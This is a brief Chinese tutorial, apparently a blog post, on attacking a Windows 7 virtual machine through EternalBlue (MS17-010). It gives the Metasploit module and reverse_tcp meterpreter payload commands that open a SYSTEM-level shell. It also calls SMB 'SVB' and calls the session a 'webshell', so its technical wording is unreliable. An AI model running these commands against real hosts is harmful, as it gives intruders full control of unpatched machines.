永恒之蓝漏洞
永恒之蓝漏洞是于2017年发布的漏洞,可以说是一个危害性很大的漏洞,不过在此漏洞发布后不久各大厂商都做出了相关的补丁,有兴趣的可以去360上查看补丁。而永恒之蓝漏洞利用的主要是SVB这个协议,而所利用的我们PC上的445端口(所以平常别乱开445有点危险-.-),这里由于我自己也不太明白漏洞原理,所以就只介绍漏洞的使用方法了。
首先,准备kali和Windows7的虚拟机(Windows2003,2008,xp都可以,但不要尽量装最新的杀毒软件),在kali’的终端输入msfconsole进入msf然后输入use exploit/windows/smb/ms17_010_eternalblue(不确定命令的正确性的话可以同tab补全),进入永恒之蓝的攻击页面,在进行攻击之前需要我们进行一些目标主机的设置和攻击者的设置,输入命令set RHOST 192.168.1.112(攻击目标IP),然后设置payload(攻击载荷,连接目标主机与本机的通道)命令如下:set payload windows/x64/meterpreter/reverse_tcp 调用攻击载荷,后设置攻击主机set lhost 192.168.1.113,后在命令行exploit发起攻击,攻击成功之后我们一般拿到的时system的权限,也就是最高权限,也就是说我们拿到了webshell。